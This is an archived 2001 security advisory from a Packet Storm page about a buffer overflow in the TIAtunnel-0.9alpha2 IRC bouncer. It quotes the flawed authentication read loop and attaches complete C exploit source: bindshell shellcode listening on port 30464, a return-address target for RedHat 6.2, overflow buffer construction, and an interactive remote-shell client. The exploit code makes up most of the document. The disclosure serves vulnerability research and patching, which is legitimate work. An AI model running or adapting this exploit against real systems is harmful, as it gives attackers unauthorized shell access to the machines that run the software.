the original cloud security

tiatunnel.c

tiatunnel.c
Posted Jun 6, 2001
Authored by qitest1 | Site qitest1.cjb.net

Tiatunnel.c is a Linux/x86 remote exploit for TIAtunnel-0.9alpha2, an IRC bouncer. Tested on RedHat 6.2 with TIAtunnel-0.9alpha2 from tar.gz. Binds a shell to port 30464.

tags | exploit, remote, shell, x86
systems | linux, redhat
MD5 | 806b38eb96baac01be27ce096fae9989

tiatunnel.c

Change Mirror Download
  /* qitest1's security advisory #001
*/

Buffer Overflow in TIAtunnel-0.9alpha2

+Systems Affected
Any system running TIAtunnel-0.9alpha2

+Program Description
TIAtunnel is a simple IRC bouncer that allows access from a simple
IPv4 box to any kind of well-known server. It has been written by
tHE rECIdjVO <recidjvo@pkcrew.org>, http://tiatunnel.pkcrew.org/.

+Vulnerability And Impact
A remote attacker can overflow a buffer and execute arbitrary code
on the system with the privileges of the user running TIAtunnel.
Infact in auth.c at line 28 we have:
struct tunnel *auth_conn(int *csock, int entries)
{
char authline[512]; /* static char buf */
struct tunnel *t_current;
int i = 0;

// Read one line from the client
bzero(authline, 512);
while((authline[i - 1] != '\n') && (authline[i - 1] != '\r') &&
(i < 1024)) { /* 1024?! =) */
read(*csock, (authline + i++), (size_t)1);
}

+Solution
Author was contacted. Upgrade your version of TIAtunnel.

+Exploit
This bug can be succesfully exploited by a remote attacker. There is
a demonstrative exploit code attached to this advisory. See the code
for more info.

--
/* qitest1 http://qitest1.cjb.net *
* ``Ut tensio, sic vis. 69 tecum sis.'' *
* main(){if(unsatisfied == 69) try_come(in);} */


[ attachment: tiatunnel.c (text/plain) ]
/*
* TIAtunnel-0.9alpha2 Linux x86 remote exploit
* by qitest1 - 5/06/2001
*
* Shellcode is executed with the privileges of the program. I
* noticed that with a simple execve() a shell was executed but its
* IO was linked with the term where TIAtunnel was launched. This
* is not a problem for us if we use a bindshell code.
*
* Greets: recidjvo->Tnx for this bug. And now you can really smile.
* Nail ->Dear friend ;)
* Hmm.. 0x69 seems to strike again..
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define RETPOS 516

struct targ
{
int def;
char *descr;
unsigned long int retaddr;
};

struct targ target[]=
{
{0, "RedHat 6.2 with TIAtunnel-0.9alpha2 from tar.gz", 0xbffff67c},
{69, NULL, 0}
};

char shellcode[] = /* bindshell at port 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

char mybuf[RETPOS + 4 + 1 + 1];

int sockami(char *host, int port);
void do_mybuf(unsigned long retaddr);
void shellami(int sock);
void usage(char *progname);

main(int argc, char **argv)
{
int i,
sel = 0,
port = 0,
offset = 0,
sock,
cnt;
char *host = NULL;

printf("\n TIAtunnel-0.9alpha2 exploit by qitest1\n\n");

if(argc == 1)
usage(argv[0]);
while((cnt = getopt(argc,argv,"h:p:t:o:")) != EOF)
{
switch(cnt)
{
case 'h':
host = strdup(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 't':
sel = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL)
usage(argv[0]);
if(port == 0)
usage(argv[0]);

printf("+Host: %s\n as: %s\n", host, target[sel].descr);
printf("+Connecting to %s...\n", host);
sock = sockami(host, port);
printf(" connected\n");

target[0].retaddr += atoi(argv[1]);
printf("+Building buffer with retaddr: %p...\n", target[0].retaddr);
do_mybuf(target[0].retaddr);
strcat(mybuf, "\n");
printf(" done\n");
send(sock, mybuf, strlen(mybuf), 0);
printf("+Overflowing...\n");

printf("+Zzing...\n");
sleep(2);
printf("+Getting shell...\n");
sock = sockami(host, 30464);
shellami(sock);
}

int
sockami(char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;

sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == -1)
{
perror("socket()");
exit(-1);
}

hp = gethostbyname(host);
if(hp == NULL)
{
perror("gethostbyname()");
exit(-1);
}

memset(&address, 0, sizeof(address));
memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons(port);

if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
{
perror("connect()");
exit(-1);
}

return(sock);
}

void
do_mybuf(unsigned long int retaddr)
{
int i,
n = 0;
unsigned long *ret;

memset(mybuf, 0x90, sizeof(mybuf));
for(i = RETPOS - strlen(shellcode); i < RETPOS; i++)
{
mybuf[i] = shellcode[n++];
}
ret = (unsigned long *) (mybuf + RETPOS);
*ret = retaddr;
mybuf[RETPOS + 4] = '\x00';
}

void
shellami(int sock)
{
int n;
char recvbuf[1024];
char *cmd = "id; uname -a\n";
fd_set rset;

send(sock, cmd, strlen(cmd), 0);

while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
n=read(sock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed by foreign host.\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(sock,recvbuf,n);
}
}
}
return;
}

void
usage(char *progname)
{
int i = 0;

printf("Usage: %s [options]\n", progname);
printf("Options:\n"
" -h hostname\n"
" -p port\n"
" -t target\n"
" -o offset\n"
"Available targets:\n");
while(target[i].def != 69)
{
printf(" %d) %s\n", target[i].def, target[i].descr);
i++;
}

exit(1);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close